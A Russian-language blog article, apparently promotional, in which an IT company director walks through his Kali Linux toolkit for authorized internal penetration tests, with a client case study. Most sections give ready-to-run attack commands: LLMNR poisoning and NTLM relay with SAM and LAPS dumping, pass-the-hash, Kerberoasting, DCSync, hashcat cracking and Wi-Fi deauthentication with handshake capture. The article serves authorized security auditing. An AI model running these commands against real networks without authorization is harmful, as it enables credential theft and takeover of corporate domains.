Kali Linux для инхаус-пентеста: что я использую на реальных аудитах
Семёнов Евгений Сергеевич, директор АйТи Фреш. 15+ лет я строю корпоративные инфраструктуры и регулярно провожу внутренние аудиты ИБ для клиентов. Это не сертифицированный OSCP-пентест, а прикладной check инфраструктуры — где дыры, как их могут эксплуатировать, что нужно закрыть в первую очередь. Набор инструментов на Kali Linux у меня устоялся за годы работы. В статье — личный топ, с примерами использования и граблями.
Зачем инхаус-пентест
Внешний пентест от специализированной конторы стоит от 300 000 руб. и проводится раз в год. Между ними инфраструктура живёт своей жизнью: ставится новое ПО, уходят сотрудники, меняются GPO. Инхаус-аудит раз в квартал закрывает дельту — находит новые дыры раньше, чем они утекут наружу.
Типовые задачи, которые решаем:
- Проверка GPO и групп AD на классические misconfigurations.
- Поиск забытых сервисных учёток с высокими привилегиями.
- Аудит паролей на предмет соответствия парольной политике.
- Проверка, не «стреляют» ли рабочие станции своими NTLM-хэшами в сеть.
- Аудит AD CS на наличие уязвимых шаблонов сертификатов.
- Сканирование внутренних веб-приложений (1С веб-клиент, Битрикс, Confluence).
Правовой момент: без бумаги — никак
Прежде чем начать — обязательное письменное согласование с руководством. Типовой rules of engagement включает:
- Список IP-диапазонов и хостов, которые разрешено сканировать.
- Список исключений (production-СУБД в рабочее время, АСУ ТП и т.п.).
- Временные окна работы (обычно — ночи и выходные).
- Контакты ответственных на случай инцидента.
- Запрет на скачивание реальных данных клиентов и персданных.
- Подпись генерального директора или ИБ-директора.
Без этого — никаких пентестов. Я лично храню бумажный оригинал с печатью до окончания проекта.
Подготовка Kali
Рабочая конфигурация: виртуалка в Proxmox/VMware, 4 vCPU, 8 ГБ RAM, 80 ГБ SSD, Kali Linux 2025.x. Сеть — в отдельном VLAN с маршрутизацией в целевую подсеть. На Dell Xeon Platinum 8280 в нашем стенде Kali запускается за 6 секунд и не тормозит даже при 10 параллельных сканах.
# Обновление Kali
apt update && apt full-upgrade -y
# Доустановка того, что обычно нужно
apt install -y bloodhound neo4j crackmapexec kerbrute \
impacket-scripts responder enum4linux-ng certipy-ad \
seclists dirsearch gobuster ffuf burpsuite nessus
# Коллекция словарей
apt install -y seclists
ls /usr/share/seclists/Разведка: nmap и пассивный сбор
Начинаем всегда с разведки. Nmap — базовый инструмент, но важно настроить скорость и не падать защитные системы:
# Быстрая инвентаризация живых хостов
nmap -sn -T3 10.10.0.0/16 -oA scans/alive
# Топ-100 портов на живых
nmap -Pn -sV -sC --top-ports 100 -T3 -iL scans/alive.gnmap -oA scans/top100
# Полный TCP-скан критичных сегментов
nmap -Pn -sS -p- -T3 --min-rate 500 10.10.1.0/24 -oA scans/fullДля Windows-сред особенно полезны скрипты: smb-os-discovery, smb-enum-shares, smb-vuln-*. Для обнаружения веб-приложений — http-title, http-methods, http-auth.
Аудит Active Directory
Самый жирный пласт находок обычно в AD. Стек из четырёх инструментов:
| Инструмент | Назначение |
|---|---|
| BloodHound + SharpHound | Визуализация attack paths, поиск уязвимых групп |
| CrackMapExec (CME) | Массовая проверка учёток, pass-the-hash, сбор инфы |
| Impacket-suite | secretsdump, psexec, wmiexec, GetNPUsers, GetUserSPNs |
| Certipy-ad | Аудит AD CS на ESC1-ESC11 уязвимости шаблонов |
# BloodHound collection через SharpHound.ps1 на доменной машине
# (запускать под пользовательской учёткой)
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\temp
# Анализ в Kali
neo4j start
bloodhound &
# Загружаем JSON в BloodHound UI, ищем "Shortest paths to Domain Admins"
# CME
crackmapexec smb 10.10.0.0/24 -u users.txt -p '<password>' --shares
crackmapexec smb 10.10.0.0/24 -u admin -H <NTLM hash> # pass-the-hash
crackmapexec smb 10.10.0.0/24 --pass-pol # политика паролей
# Impacket — AS-REP Roasting
GetNPUsers.py corp.example.ru/ -usersfile users.txt \
-format hashcat -outputfile asrep.hash
# Kerberoasting
GetUserSPNs.py corp.example.ru/user:pass -request -output spn.hash
hashcat -m 13100 spn.hash /usr/share/wordlists/rockyou.txt
# Certipy — проверка AD CS
certipy find -u user@corp.example.ru -p '<password>' -dc-ip 10.10.0.10 -vulnerableRelay и Poisoning
Классика внутренних пентестов — Responder + NTLMRelayX. Responder слушает LLMNR/NBT-NS/MDNS-запросы, отвечает за несуществующие машины и получает NTLM-хэши. NTLMRelayX тут же переигрывает их на SMB/LDAP/MSSQL.
# Responder в режиме analyze (не отвечает, только слушает)
responder -I eth0 -A
# Боевой режим с подделкой ответов
responder -I eth0 -wrfv
# NTLM Relay на SMB signing-disabled хосты
# Находим хосты без SMB-подписи
crackmapexec smb 10.10.0.0/24 --gen-relay-list targets.txt
# Запускаем relay с выгрузкой SAM
impacket-ntlmrelayx -tf targets.txt -smb2support \
--dump-sam --dump-lapsВ большинстве корпораций, которые мы аудитили, LLMNR включен, SMB signing отключен — и получение доменного админа через этот вектор занимает 20–40 минут.
Пароли: пост-эксплуатация
После получения NTDS.dit с DC (через secretsdump.py или DCSync) — анализируем пароли:
# DCSync (требует привилегий Replicating Directory Changes)
secretsdump.py corp.example.ru/admin:pass@10.10.0.10 -just-dc-ntlm
# Взлом NTLM-хэшей
hashcat -m 1000 ntlm.hash /usr/share/wordlists/rockyou.txt \
-r /usr/share/hashcat/rules/best64.rule
# Анализ сложности
pipal ntds.txt # статистика по длинам, паттернам
hashid hash.txt # если тип хэша неизвестенУ нас на практике на офисе 120 сотрудников из 120 NTDS-хэшей в течение двух часов ломалось в среднем 35–45% — люди используют «Qwerty2024!», «CompanyName123», сезон+год и вариации.
Веб-приложения
Для внутренних веб-интерфейсов (1С, Битрикс, CRM, админки принтеров и коммутаторов):
- Burp Suite — прокси для ручного тестирования, поиск SQLi, XSS, IDOR, SSRF.
- Nuclei — автоматический сканер по шаблонам CVE.
- Dirsearch/ffuf — поиск скрытых директорий и файлов.
- Nessus/OpenVAS — общий сканер уязвимостей инфраструктуры.
# Nuclei с шаблонами CVE
nuclei -u http://crm.corp.example.ru -t cves/ -o nuclei-results.txt
# Dirsearch
dirsearch -u http://crm.corp.example.ru -e php,asp,aspx,jsp -x 404
# ffuf для vhost brute
ffuf -u http://10.10.0.50/ -H "Host: FUZZ.corp.example.ru" \
-w subdomains.txt -fs 0Мини-кейс: аудит офиса 180 РМ
В июле 2025 года клиент — торговая сеть в Москве, 180 рабочих мест, 2 DC, 12 серверов. Запрос — пред-ревизионный аудит инфраструктуры перед заключением контракта с федеральным поставщиком, который требует чек-лист безопасности.
Работа 5 дней:
- День 1: согласование rules of engagement, подключение Kali в guest VLAN с маршрутом в корпоратив.
- День 2: полная инвентаризация nmap + BloodHound. Найдено 3 сервера с SMBv1, 2 принтера с дефолтными паролями, 8 хостов без SMB-signing.
- День 3: relay-атака через Responder + NTLMRelayX — получен админский хэш на одном из серверов. DCSync — экспорт NTDS.
- День 4: hashcat на выделенном сервере с RTX 4090 — за 6 часов сломано 47% паролей, среди них — hrdirector (Весна2024!) и admin1с (1cAdmin123).
- День 5: Certipy — найден шаблон ESC1 (any user может запросить сертификат на любого), что давало путь к DA.
Итог: отчёт на 42 страницы, 23 находки (3 critical, 8 high, 12 medium). Клиент за 3 недели закрыл все critical, провёл смену паролей, внедрил SMB signing и LDAP Channel Binding. Стоимость аудита — 185 000 руб.
Беспроводные сети
Для аудита Wi-Fi использую aircrack-ng и hashcat:
# Перевод карты в monitor mode
airmon-ng start wlan0
# Скан сетей
airodump-ng wlan0mon
# Захват handshake WPA2-PSK
airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w handshake wlan0mon
# Параллельно — deauth клиента для force re-auth
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
# Взлом
hashcat -m 22000 handshake.hc22000 /usr/share/wordlists/rockyou.txtДля WPA2-Enterprise (802.1X) смотрим через eaphammer — подделываем RADIUS-сервер и ловим MSCHAPv2 challenge-response клиентов.
Организация рабочего процесса
Я всегда работаю по одной схеме: каждый день — отдельная директория, ведение лога в Markdown с таймстемпами, скриншоты в PNG, sha256 всех выгруженных файлов. В конце — отчёт по шаблону с разделами:
- Executive summary (1–2 страницы для руководства).
- Методология (как что проверялось).
- Список находок с CVSS, воспроизведением, PoC, рекомендациями.
- Техническое приложение с выводами команд и скринами.
- План устранения по приоритетам.
Проведём внутренний аудит безопасности
Инхаус-пентест корпоративной сети: AD, рабочие станции, сервисы, веб-приложения, Wi-Fi. От 3 до 10 рабочих дней в зависимости от размера инфраструктуры. Полный отчёт с приоритетом и планом устранения. 15+ лет опыта в корпоративном IT.
Телефон: +7 903 729-62-41
Telegram: @ITfresh_Boss
Семёнов Евгений Сергеевич, директор АйТи Фреш
FAQ — частые вопросы про Kali и пентест
- Что такое Kali Linux?
- Kali Linux — дистрибутив на базе Debian, специально собранный для целей ИБ: предустановлено более 600 инструментов для разведки, сканирования уязвимостей, эксплуатации, форензики и анализа вредоносного ПО.
- Законно ли использовать Kali Linux в офисе?
- Да, если вы проверяете свою инфраструктуру с письменного разрешения руководства (rules of engagement). Без согласования или против чужой инфраструктуры — это нарушение 272–274 УК РФ.
- С чего начать внутренний пентест?
- С пассивной разведки: nmap без агрессивных опций, сбор DNS, Netbios, LLMNR-трафика через Responder в режиме analyze. Потом активное сканирование уязвимостей (Nessus, OpenVAS), потом целевая эксплуатация.
- Какие инструменты дают максимальную отдачу в AD?
- BloodHound для визуализации attack paths, CrackMapExec для массовой проверки учёток и настроек, Impacket-suite для всего остального (secretsdump, psexec, wmiexec, GetNPUsers). Дополнительно — Certipy для аудита AD CS.
- Как документировать результаты пентеста?
- Я всегда веду Markdown-лог с таймстемпами команд, скриншотов и выводов. В конце — отчёт с найденными уязвимостями по CVSS, рекомендациями и подтверждающими скринами. Для клиента — executive summary на 1-2 страницы.